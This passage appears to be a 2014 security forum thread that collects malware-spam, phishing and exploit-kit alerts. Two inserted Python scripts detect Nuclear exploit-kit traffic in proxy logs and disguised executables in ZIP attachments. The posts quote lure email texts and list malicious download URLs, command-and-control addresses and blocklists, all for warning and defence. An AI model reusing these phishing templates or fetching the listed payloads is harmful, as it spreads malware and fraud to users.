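    "fuhloizle.pgaof39.com",
    "fuhloizle.cusssa.org",
}

# Squid access.log layout (assumed): ts elapsed client code/status bytes method
# URL rfc931 peerstatus/peerhost type. Adapt the regex to your proxy's format.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+(?P<status>\S+)\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)\s+\S+\s+(?P<peer>\S+)"
)
HOST_RE = re.compile(r"^(?:[a-z]+://)?(?P<host>[^/:\s]+)", re.IGNORECASE)


@dataclass(frozen=True)
class Hit:
    client: str
    host: str
    reason: str


def host_from_url(url):
    m = HOST_RE.match(url)
    return m.group("host").lower() if m else ""


def peer_ip(peer):
    """'DIRECT/178.79.182.106' -> IPv4Address, or None if not an address."""
    try:
        return ipaddress.ip_address(peer.rsplit("/", 1)[-1])
    except ValueError:
        return None


def classify_host(host):
    """Return why a requested host is suspicious, or None if it is not."""
    if host in NUCLEAR_EK_HOSTS:
        return "known Nuclear EK hostname"
    # Match the label as a whole DNS label so that a hostname merely containing
    # the string (e.g. "fuhloizlefoo.example.net") does not trigger.
    if NUCLEAR_EK_LABEL in host.split("."):
        return "hijacked-subdomain label '%s'" % NUCLEAR_EK_LABEL
    try:
        if ipaddress.ip_address(host) == NUCLEAR_EK_IP:
            return "direct access to Nuclear EK IP"
    except ValueError:
        pass
    return None


def find_nuclear_ek_hits(lines):
    """Parse proxy log lines and return a Hit for every indicator match."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host = host_from_url(m.group("url"))
        reason = classify_host(host)
        # A freshly hijacked subdomain will not be on any list yet, so also
        # check which IP the proxy actually connected to.
        if reason is None and peer_ip(m.group("peer")) == NUCLEAR_EK_IP:
            reason = "resolved to Nuclear EK IP"
        if reason:
            hits.append(Hit(m.group("client"), host, reason))
    return hits


# Constructed sample log lines (not real traffic; hostnames other than the
# three quoted above are made up).
SAMPLE_LOG = """\
1412844000.123 210 10.0.0.21 TCP_MISS/200 5120 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html
1412844002.456 180 10.0.0.21 TCP_MISS/200 812 GET http://fuhloizle.tryzub-it.co.uk/ - DIRECT/178.79.182.106 text/html
1412844003.789 95 10.0.0.35 TCP_MISS/302 0 GET http://fuhloizle.newvictim.example/gate.php - DIRECT/178.79.182.106 -
1412844005.000 60 10.0.0.35 TCP_MISS/200 40960 GET http://178.79.182.106/load.jar - DIRECT/178.79.182.106 application/java-archive
1412844006.000 70 10.0.0.50 TCP_MISS/200 300 GET http://fuhloizlefoo.example.net/ - DIRECT/203.0.113.9 text/html
1412844007.000 65 10.0.0.50 TCP_MISS/200 7000 GET http://cdn.someotherhost.example/x.swf - DIRECT/178.79.182.106 application/x-shockwave-flash
"""

if __name__ == "__main__":
    for hit in find_nuclear_ek_hits(SAMPLE_LOG.splitlines()):
        print(hit)
```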
AplusWebMaster
2014-10-10, 16:43
FYI...
Fake fax, 'Secure msg' SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-youve-received-new-fax-you.html
10 Oct 2014 - "A pair of malware spams this morning, both with the same payload:
"You've received a new fax"
From: Fax [fax@ victimdomain .com]
Date: 10 October 2014 11:34
Subject: You've received a new fax
New fax at SCAN7097324 from EPSON by https ://victimdomain .com
Scan date: Fri, 10 Oct 2014 18:34:56 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)
"You have received a new secure message from BankLine"
From: Bankline [secure.message@ bankline .com]
Date: 10 October 2014 10:29
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...
The malware downloads a file document_73128_91898_pdf.zip from the target site that contains a malicious executable document_73128_91898_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the ThreatExpert report... the malware communicates with the following URLs which are probably worth -blocking- or monitoring"
94.75.233.13 /1010uk1/NODE01/41/5/1/
94.75.233.13 /private/sandbox_status.php
94.75.233.13 /1010uk1/NODE01/0/51-SP3/0/
94.75.233.13 /1010uk1/NODE01/1/0/0/
beanztech .com/beanz/1010uk1.rtf
* https://www.virustotal.com/en/file/5c3643b5cf2c5a392a55589e5025bfe659149a0b5da662ad8989f25005ba28cc/analysis/1412937674/
94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
___
Gameover Zeus... at Vogue .com
- http://www.threattracksecurity.com/it-blog/gameover-zeus-accessorizes-vogue-com/
Oct 10, 2014 - "Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp ://media .vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exe
... Others have spotted Gameover Zeus reaching out to a compromised vogue.com domain to download Zemot – a family of Trojan downloaders – which according to Microsoft is usually distributed via the Kuluoz botnet*. Behavior worth noting in this Gameover Zeus sample upon execution is that it crawled a list of DGA domains... this Gameover Zeus sample seems to be an updated variant targeting -financial- processes we’ve not yet seen in previous reports... According to URLquery.net**, there were several malicious files being served on the Vogue domain, which have been removed. 1zX67.exe was an active threat as late as yesterday evening..."
* http://blogs.technet.com/b/mmpc/archive/2014/09/09/msrt-september-2014-zemot.aspx
** http://www.urlquery.net/report.php?id=1412718766058
___
Mobile ads use malware tricks to get installs
- https://blog.malwarebytes.org/mobile-2/2014/10/mobile-advertisers-use-malware-tricks-to-get-installs/
Oct 10, 2014 - "Deceptive advertising targeting Android users is an effective way of getting malware installed. Now some advertisers are using it to get paid through pay-per-install schemes... we’ve been seeing more and more of this, but this time advertisers are using these banner and pop-up ads to get installs of more trustworthy apps like Dolphin browser. The messages are less scary than the virus related ones, but they are still meant to get your attention. It seems a bit backwards but it’s all about making money; ad developers are just as greedy as malware authors–just not as malicious. Anytime during your mobile browsing experience, if you encounter one of these pop-ups or similar, just ignore it, and it’d probably be best to -leave- the site displaying them:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads06.jpg?w=564
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads05.jpg?w=564
Don’t fall for these messages. Android won’t use web pop-ups to inform you of updates; they’ll be handled through a system notification and apps will update via Google Play Services. Using a tool like Adblock Plus, which will filter URL traffic, can help prevent most of these ads. Adblock Plus is a third-party app that will require a bit of configuration* and only blocks WiFi traffic.
* https://adblockplus.org/en/android-config
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ad11.jpg
On iOS you won’t see the warning pop-ups; instead you’ll immediately be -redirected- to the peddled app’s App Store page. If, by chance, you’re interested in installing one of these apps go -directly- to your trusted source for apps. By following the redirect you might be going down another rabbit hole and end up getting -malware- instead of the original."
___
October 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/10/10/october-2014-web-server-survey.html
10 Oct 2014 - "In the October 2014 survey we received responses from 1,028,932,208 sites, which is nearly six million more than last month. Microsoft lost the lead to Apache this month, as the two giants continue to battle closely for the largest share of all websites. Apache gained nearly 30 million sites, while Microsoft lost 22 million, causing Apache to be thrust back into the lead by more than 36 million sites. In total, 385 million sites are now powered by Apache, giving it a 37.45% share of the market. A significant contributor to this change was the expiry of domains previously used for link farming on Microsoft IIS servers. The domains used by these link farms were acquired and the sites are now hosted on Apache servers..."
(Charts available at the URL above.)
:fear: :mad:
AplusWebMaster
2014-10-13, 12:31
FYI...
Fake Amazon SPAM - Word doc malware
- http://myonlinesecurity.co.uk/amazon-co-uk-order-word-doc-malware/
13 Oct 2014 - "'Your Amazon.co.uk order #} random letters and numbers' pretending to come from AMAZON .CO.UK <order@ amazon .co.uk> and all being sent to 1122@ eddfg .com with a bcc to your email address is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/amazon_order_Oct.png
13 October 2014 : 575-3010892-0992746.doc Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is -NEVER- open any attachment to an email, unless you are expecting it... The best way is to just delete the unexpected zip and not risk any infection."
* https://www.virustotal.com/en/file/3bbcdea4e4f6427296f8b57a77ee70967b9a91a703d69306296c78e1e92fe318/analysis/1413181748/
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-spam-with.html
13 Oct 2014
___
Fake BankLine SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-you-have-received-new.html
13 Oct 2014 - "A couple of unimaginative spam emails leading to a malicious payload.
You have received a new secure message from BankLine
From: Bankline [secure.message@ bankline .com]
Date: 13 October 2014 12:48
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...
You've received a new fax
From: Fax [fax@ victimdomain .com]
Date: 13 October 2014 13:07
Subject: You've received a new fax
New fax at SCAN2166561 from EPSON by https ://victimdomain .com
Scan date: Mon, 13 Oct 2014 20:07:31 +0800
Number of pages: 2
Resolution: 400x400 DPI
(Dropbox Drive is a file hosting service operated by Google, Inc.)
Clicking the link downloads document_312_872_pdf.zip from the target site which in turn contains a malicious executable document_312_872_pdf.exe which has a VirusTotal detection rate of 3/54*... Also dropped are a couple of executables, egdil.exe (VT 2/54**, Malwr report) and twoko.exe (VT 6/55***, Malwr report).
Recommended blocklist:
94.75.233.13
144.76.220.116
85.25.152.238
carcomputer .co.uk
phyccess .com
hotelnuovo .com
wirelesssolutionsny .com
isc-libya .com "
* https://www.virustotal.com/en/file/a598ddc9af8438ac29a43a33c8dae09a996d77a5ae10331d7a02ea1df1e0d339/analysis/1413208781/
** https://www.virustotal.com/en/file/35274a3ffbe34b8b17ccdc147cd721c5748d39c6a143b0e4b67812767a4d197b/analysis/1413210259/
*** https://www.virustotal.com/en/file/e464613eaa2aec9fee27a4e3bb91219ca2c5cb38a41217604d6cde292f416445/analysis/1413210280/
___
Barclaycard phishing ...
- http://myonlinesecurity.co.uk/barclaycard-phishing-attempts/
13 Oct 2014 - "We are seeing quite a few Barclaycard phishing attempts today trying to get your Barclaycard details. These are not very well crafted and look nothing like any genuine Barclaycard emails. Do -not- click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t Barclaycard. Immediately delete the email; the safest way to make sure that it isn’t a genuine email from Barclaycard is to type the Barclaycard web address in your browser, and then log in to the account that way...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-email.png
... using what look like they are hijacked/compromised subdomains of a real website. All of them use a random subdomain and then the website name and then /clients/? The site looks like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-site.png
Following the link in this Barclaycard or other spoofed emails takes you to a website that looks exactly like the real Barclaycard site. You are then taken through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Barclaycard account, but also your Bank Account, and potentially your email details and webspace (if you have it). They want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___
Fake Bank application SPAM - malware
- http://www.hoax-slayer.com/fnbo-account-application-malware-email.shtml
Oct 13 2014 - "Email purporting to be from First National Bank of Omaha (FNBO) claims that your account application has been received and invites you to open an -attached- file to view documents about your application:
Re: Applicant #9908541042
Hello,
Your application for an FNBO Direct account has been received. As an FNBO Direct customer, not only will you receive an exceptional interest rate, you can be confident your accounts are held by a bank established in values of trust, integrity, and security.
Please find in the attached document information concerning your application.
Copyright (c) 2014 FNBO Direct, a division of First National Bank of Omaha. All Rights Reserved. Deposit Accounts are offered by First National Bank of Omaha,
Member FDIC. Deposits are insured to the maximum permitted by law.
P.O. Box 3707, Omaha, NE 68103-0707
For information on FNBO Direct's privacy policy, please visit [Link removed]
Email ID: A0963.6
(Email included attached file with the name: 'FNBO_Direct_application_9908541042.zip')
According to this email, which claims to be from First National Bank of Omaha (FNBO), your application for an FNBO Direct account has been received. The message advises that information about your application is contained in an -attached- document... it masquerades as a seemingly legitimate business message and uses the name of a real company... the attached .zip file... contains a .exe file. Clicking the .exe file would install a trojan on your computer... do -not- open any attachments or click any links that it contains. You can report fraudulent FNBO emails via the reporting address on the bank's website*."
* https://www.fnbodirect.com/site/security-center/email-fraud.fhtml
___
Fake FedEx SPAM
- http://blog.mxlab.eu/2014/10/12/fake-email-your-payment-invoice-slip-from-fedex-contains-trojan/
Oct 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Payment Invoice Slip”. This email is sent from the -spoofed- address “info@ ukboxingstore .co.uk” and has the following body:
Dear customer.
A parcel was sent to your home address.
And it will arrive within 3 business day.
More information and the tracking number are attached in the document.
Please do not respond to this message. This email was sent from an unattended mailbox.
This report was generated at approximately GMT on 06/10/2014.
To learn more about FedEx Express, please visit our website at fedex.com.
All weights are estimated.
To track the latest status of your shipment, View on the tracking number on the attached document
This tracking update has been sent to you by FedEx on the behalf of the Request or noted above.
FedEx does not validate the authenticity of the requestor and does not validate,
guarantee or warrant the authenticity of the request, the requestor’s message, or the accuracy of this tracking update...
Thank you for your business.
FedEx Customer Service
The attached ZIP file has the name FEDEX SHIPPING NOTIFICATION (1).zip and contains the 396 kB large file XXXX.exe. The trojan is known as TR/Dropper.Gen8, a variant of Win32/Injector.BNJA, HB_Ispi or Win32:Malware-gen. At the time of writing, 5 of the 55 AV engines did detect the trojan at VirusTotal*..."
* https://www.virustotal.com/en/file/7ffd0d31de67f7ece1bf472959078fda55a8091b9487e55c9a3579d8f55a68b1/analysis/1413096741/
:mad: :fear:
AplusWebMaster
2014-10-14, 16:14
FYI...
Fake DOC attachment SPAM - malware
- http://blog.dynamoo.com/2014/10/to-view-your-document-please-open.html
14 Oct 2014 - "This spam comes with a malicious DOC attachment:
From: Anna [ºžô õö?ǯ#-øß {qYrÝsØ l½:ž±þ EiÉ91¤É¤y$e| p‹äŒís' ÀQtÃ#7 þ–¿åoù[þ–¿åoù[þ–¿åoù[þ–¿åÿ7 å{˜x|%S;ÖUñpbSË‘ý§B§i…¾«¿¨` Òf ¶ò [no-reply@ bostonqatar .net]
Date: 14 October 2014 11:09
Subject: Your document
To view your document, please open attachment.
The "From" field in the samples I have seen seems to be a random collection of characters. The DOC attachment is also randomly named in the format document_9639245.doc. This word document contains a malicious macro [pastebin] which downloads an additional component from pro-pose-photography .co.uk/fair/1.exe. The DOC file has a VirusTotal detection rate of 0/55* and the EXE file is just 2/54** ... UPDATE: among other things the malware drops the executable pefe.exe with a detection rate of 3/55***..."
* https://www.virustotal.com/en-gb/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281775/
** https://www.virustotal.com/en-gb/file/9f202cf5e15101c5a7e05280ad4dc86092b4036dcbbd8dd144e58c4115638e75/analysis/1413283670/
*** https://www.virustotal.com/en-gb/file/c9ae7f694229861dd05492bd532980f2504c3bc3ce58fd6fad71c44cb053d643/analysis/1413287366/
- http://myonlinesecurity.co.uk/document-word-doc-malware/
14 Oct 2014 - "... The email is very plain, simple and terse and just says:
To view your document, please open attachment.
14 October 2014: document_1720781.doc Current Virus total detections: 0/55* ..."
* https://www.virustotal.com/en/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281933/
___
Fake Sales Order SPAM - word doc malware
- http://myonlinesecurity.co.uk/sales-order-number-son1410-000183-fake-word-doc-malware/
14 Oct 2014 - "'Sales Order Number SON1410-000183' pretending to come from mail@ firwood .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
<html>
<body bgcolor="#FFFFFF">
<table width="750" border="0">
<tr>
<td>
<font face="verdana" size="2"></font>
<br><br>
<font face="verdana" size="2">Please find the attached document a summary
of which is below:</font>
</td>
</tr>
</table>
<table width="750" border="0"> ...
</table>
<font face="verdana" size="2">Regards </br></br><B>Firwood Paints Ltd
</B></br>Oakenbottom Road </br>Bolton BL2 6DP England </br></br>Tel +44
(0)1204 525231 </br>Fax +44 (0)1204 362522 </br>e mail mail@ firwood .co.uk
</br></font>
</body>
</html>
Automated mail message produced by DbMail.
Registered to X3 – Sage North America, License EDM2013051.
This message has been scanned for viruses by BlackSpider MailControl ...
14 October 2014: Extracts to: SON141000-000183.pdf.exe
Current Virus total detections: 13/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1fd1e3787b4982b6029ebd9859d6aff3bd313903a2322c29a80bbd105a5651ac/analysis/1413274440/
___
YouTube Ads lead to Exploit Kits ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/
Oct 14, 2014 - "Malicious ads are a common method of sending users to sites that contain malicious code. Recently, however, these ads have showed up on a new attack platform: YouTube. Over the past few months, we have been monitoring a malicious campaign that used malicious ads to direct users to various malicious sites. Users in the United States have been affected almost exclusively, with more than 113,000 victims in the United States alone over a 30-day period.
Countries affected by this malicious ad campaign:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/malad.jpg
Recently, we saw that this campaign was showing up in ads via YouTube as well. This was a worrying development: not only were malicious ads showing up on YouTube, they were on videos with more than 11 million views – in particular, a music video uploaded by a high-profile record label. The ads we’ve observed do not -directly- lead to malicious sites from YouTube. Instead, the traffic passes through two advertising sites, suggesting that the cybercriminals behind this campaign bought their traffic from legitimate ad providers. In order to make their activity look legitimate, the attackers used the -modified- DNS information of a Polish government site. The attackers did not compromise the actual site; instead they were able to change the DNS information by adding subdomains that lead to their own servers. (How they were able to do this is unclear.) The traffic passes through two -redirection- servers (located in the Netherlands) before ending up at the malicious server, located in the United States. The exploit kit used in this attack was the Sweet Orange exploit kit. Sweet Orange is known for using four vulnerabilities, namely:
CVE-2013-2460 – Java
CVE-2013-2551 – Internet Explorer
CVE-2014-0515 - Flash
CVE-2014-0322 – Internet Explorer
Based on our analyses of the campaign, we were able to identify that this version of Sweet Orange uses vulnerabilities in Internet Explorer. The URL of the actual payload constantly changes, but they all use subdomains on the same Polish site mentioned earlier. However, the behavior of these payloads is identical. The final payloads of this attack are variants of the KOVTER malware family, which are detected as TROJ_KOVTER.SM. This particular family is known for its use in various ransomware attacks, although they lack the encryption of more sophisticated attacks like Cryptolocker. The websites that TROJ_KOVTER.SM accesses in order to display the fake warning messages are no longer accessible. Users who keep their systems up to date will not be affected by this attack, as Microsoft released a patch for this particular vulnerability in May 2013. We recommend that users read and apply the software security advisories by vendors like Microsoft, Java, and Adobe, as old vulnerabilities are still being exploited by attackers. Applying the necessary patches is an essential part of keeping systems secure..."
:mad: :fear::fear:
AplusWebMaster
2014-10-15, 14:58
FYI...
Fake delivery SPAM - word doc malware ...
- http://myonlinesecurity.co.uk/inform-package-way-fake-word-doc-malware/
15 Oct 2014 - "An email pretending that you have purchased an unspecified item from an unspecified store saying 'This is to inform you that the package is on its way to you' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Thank you for buying at our store!
Date ordered: October 14 2014
This is to inform you that the package is on its way to you. We also included delivery file to your shipping address.
Payment Nr : 7795816097 Order total : 527.54 USD Delivery date : 10/ 22th 2014.
Please review the attached document.
15 October 2014: 0048898757_order _doc.zip: Extracts to: 0048898757_order _doc.exe
Current Virus total detections: 7/54*. This 'This is to inform you that the package is on its way to you' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8c41235f43356c845b193b04efa60bbecb1787028e8ad6e25eb4c01ee2d94804/analysis/1413361301/
___
Fake 'Shipping Info' SPAM
- http://blog.dynamoo.com/2014/10/shipping-information-for-spam-uses.html
15 Oct 2014 - "This fake shipping spam contains malware, although it appears that it may be buggy and might not install properly.
Screenshot: https://3.bp.blogspot.com/-l3nlpqmPSoo/VD6K3ZdvApI/AAAAAAAAF1E/a_k4VUkXNX0/s1600/shipping-info.png
The link in the email goes to https ://www.google .com/url?q=https%3A%2F%2Fcopy.com%2FEl9fd4VfLkfN%2FTrackShipment_0351.PDF.scr%3Fdownload%3D1&sa=D&sntz=1&usg=AFQjCNE0-3UrX7jNPzSGYodsQVzmBhrwMA which bounces through Google and then downloads a malicious executable TrackShipment_0351.PDF.scr which has a VirusTotal detection rate of 4/54*... What I think is meant to happen is that a malicious script, which has been disguising itself as a GIF file, renames a component Gl.png to Gl.exe and then attempts to execute it... This executable has a VirusTotal detection rate of 2/53**. It bombs out of automated analysis tools... possibly because it is being executed with the wrong parameters. It also opens a seemingly legitimate PDF file (VT 0/54***) which is designed to look like a Commercial Invoice, presumably to mask the fact that it is doing something malicious in the background.
> https://4.bp.blogspot.com/-86SXLSZk37U/VD6PBROpsAI/AAAAAAAAF1c/ZRCiUJev-KI/s1600/commerical-invoice.png
If you opened a file similar to this and you saw a PDF with a blank Commercial Invoice like the one pictured above, then you've probably been -infected- by the executable running in the background."
* https://www.virustotal.com/en-gb/file/e5f0ea546dcfb99803c9a02df82f587fa09b16c87337e868d8eabf360178ba59/analysis/1413383394/
** https://www.virustotal.com/en-gb/file/f9cca52c9d840f3cfc8997e77a42ebc7640ea71f7729fa1782d8596a05ed963b/analysis/1413384221/
*** https://www.virustotal.com/en-gb/file/409e472b667ae747942e10d4dc691796c3b2eb00a0e407146e69b2f8205de40c/analysis/1413384174/
___
Fake Paypal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-transaction-complete-fake-pdf-malware/
15 Oct 2014 - "'Transaction not complete' pretending to come from PayPal is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction.
Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please see attached payment receipt .
15 October 2014: Transaction25765048.zip: Extracts to: Transaction_21633987.scr
Current Virus total detections: 7/54*. This 'Transaction not complete' pretending to come from PayPal is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4b742cf87e49bc1cca0ce474ac34dd04ae00e28783aeafcfcd5a45a369be6543/analysis/1413387437/
:fear: :mad:
AplusWebMaster
2014-10-16, 23:23
FYI...
Fake Bank SPAM
- http://blog.dynamoo.com/2014/10/barclays-bank-transaction-not-complete.html
16 Oct 2014 - "This fake Barclays spam leads to malware.
From: Barclays Bank [Barclays@email .barclays .co.uk]
Date: 16 October 2014 12:48
Subject: Transaction not complete
Unable to complete your most recent Transaction.
Currently your transaction has a pending status. If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt below...
Clicking on the link downloads a file document23_pdf.zip containing a malicious executable document23_pdf.scr which has a VirusTotal detection rate of 4/54*. The Malwr report shows that it reaches out to the following URLs:
http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/
http ://188.165.214.6 :12302/1610uk1/HOME/1/0/0/
http ://188.165.214.6 :12302/1610uk1/HOME/41/5/1/
http ://jwoffroad .co.uk/img/t/1610uk1.osa
In my opinion 188.165.214.6 (OVH, France) is an excellent candidate to -block- or monitor. It also drops two executables, bxqyy.exe (VT 5/54** ...) and ldplh.exe (VT 1/51*** ...)."
* https://www.virustotal.com/en/file/626687777469a5a1cca0303fd565ee230fb5f5799a6d8cbaec097a5f7266eb28/analysis/1413462043/
... Behavioural information
DNS requests
jwoffroad .co.uk (88.208.252.216)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
88.208.252.216: https://www.virustotal.com/en/ip-address/88.208.252.216/information/
** https://www.virustotal.com/en/file/8d5d66e390e2293bec87422dfa2f4683b423e8084a07de207a75d2831f88d9a8/analysis/1413462507/
*** https://www.virustotal.com/en/file/752afd97f0473ec909797c02ac49b3f33e94ca06d6678af517d6d2fe98e00341/analysis/1413462517/
___
Many .su and .ru domains leading to malware
- http://blog.dynamoo.com/2014/10/a-bunch-of-su-and-ru-domains-leading-to.html
16 Oct 2014 - "These sites lead to some sort of malware. The presence of .SU domains hosted on what looks like a botnet is probably all you need to know.... recommend watching out for these..."
(Long list at the dynamoo URL above.)
- https://www.abuse.ch/?p=3581
- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
"The obsolete .su (Soviet Union) domain is usually a tell-tale sign..."
___
Fake Invoice SPAM
- http://myonlinesecurity.co.uk/re-invoice-4023390-fake-pdf-malware/
16 Oct 2014 - "'RE: Invoice #4023390' pretending to come from Sage Accounting < Alfonso.Williamson@ sage-mail .com >is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please see attached copy of the original invoice.
16 October 2014: Invoice_4017618.zip: Extracts to: Invoice_4017618.exe
Current Virus total detections: 5/54* . This RE: Invoice #4023390 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9645b9120975b47e440f60c182e4701e14c9f653a55bb0b4bec82bb71fe1c2d/analysis/1413490281/
... Behavioural information
DNS requests
lewis-teck .co.uk (5.77.44.47)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
5.77.44.47: https://www.virustotal.com/en/ip-address/5.77.44.47/information/
:fear::fear: :mad:
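The PayPal, Barclays and Sage runs above all rely on the same trick: a ZIP whose member is a .scr or .exe wearing a PDF or Excel icon, sometimes with a double extension such as .xls.exe or .PDF.scr. The following is an added example (not code from the original posts or from the quoted blogs) of a mail-gateway or analyst-side triage script: it classifies each archive member by name and, independently, by whether the first bytes are a PE header, so a PE behind a document name is flagged even when the icon and extension say otherwise. The archive and the PE stub are constructed in memory; the extension lists are assumptions for the example.

```python
"""Triage a ZIP e-mail attachment for disguised executables.

Added example, not code from the original posts or the quoted blogs.  It
mirrors the recurring pattern on this page: Transaction25765048.zip
extracting to Transaction_21633987.scr, Copy4313_B0.zip extracting to
Invoice_7380901925299.xls.exe, and the TrackShipment_0351.PDF.scr lure.
The archive below is constructed in memory, so nothing is downloaded and
nothing is executed.
"""
import io
import zipfile

# Extensions Windows will run on double-click whatever icon the file shows.
# The set is an assumption for this example, not an exhaustive list.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
             "vbs", "vbe", "wsf", "hta"}
# Document types the lures on this page imitate ("PDF malware", "xls malware").
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt", "jpg", "png"}


def classify_name(name: str) -> str:
    """Verdict from the member name alone (case-insensitive)."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    if len(parts) < 2:
        return "no-extension"
    last, inner = parts[-1], set(parts[1:-1])
    if last in EXEC_EXTS and inner & DOC_EXTS:
        return "double-extension-executable"      # Invoice.xls.exe, x.PDF.scr
    if last in EXEC_EXTS:
        return "executable"                       # Transaction_21633987.scr
    return "document"


def is_pe(data: bytes) -> bool:
    """True if data starts a Portable Executable: 'MZ' at offset 0 and
    'PE\\0\\0' at the offset stored in e_lfanew (bytes 0x3C..0x3F)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_zip(zip_bytes: bytes) -> list:
    """Return (member name, verdict) pairs.  Only the first 1 KiB of each
    member is read, so nothing is written to disk."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(0x400)
            verdict = classify_name(info.filename)
            # A PE header behind a document name is the spoofed-icon case
            # the posts describe: the icon lies, the bytes do not.
            if is_pe(head) and verdict == "document":
                verdict = "pe-disguised-as-document"
            findings.append((info.filename, verdict))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive.  The PE stub carries only the two
    signatures is_pe() looks for; it is not a runnable program."""
    stub = bytearray(0x100)
    stub[0:2] = b"MZ"
    stub[0x3C:0x40] = (0x80).to_bytes(4, "little")
    stub[0x80:0x84] = b"PE\x00\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Transaction_21633987.scr", bytes(stub))
        zf.writestr("Invoice_7380901925299.xls.exe", bytes(stub))
        zf.writestr("readme.pdf", bytes(stub))    # PE behind a document name
        zf.writestr("notes.txt", b"plain text\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member, verdict in scan_zip(build_sample_zip()):
        print(f"{verdict:30} {member}")
```

Run it as-is to see the four verdicts. The point of checking both name and content is that the two failure modes differ: a double extension is caught by name even when the file is not a PE (a script, say), while a bare .pdf that begins with MZ is caught by content even though the name is clean.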
AplusWebMaster
2014-10-17, 13:50
FYI...
Fake Sage Invoice SPAM - malware
- http://blog.dynamoo.com/2014/10/sage-outdated-invoice-spam-spreads.html
17 Oct 2014 - "This -fake- Sage email spreads malware using a service called Cubby, whatever that is.
Screenshot: https://2.bp.blogspot.com/-UFvbcQMZeqc/VEDn4-OJqZI/AAAAAAAAF2I/M7n6GtqZVRM/s1600/sage3.png
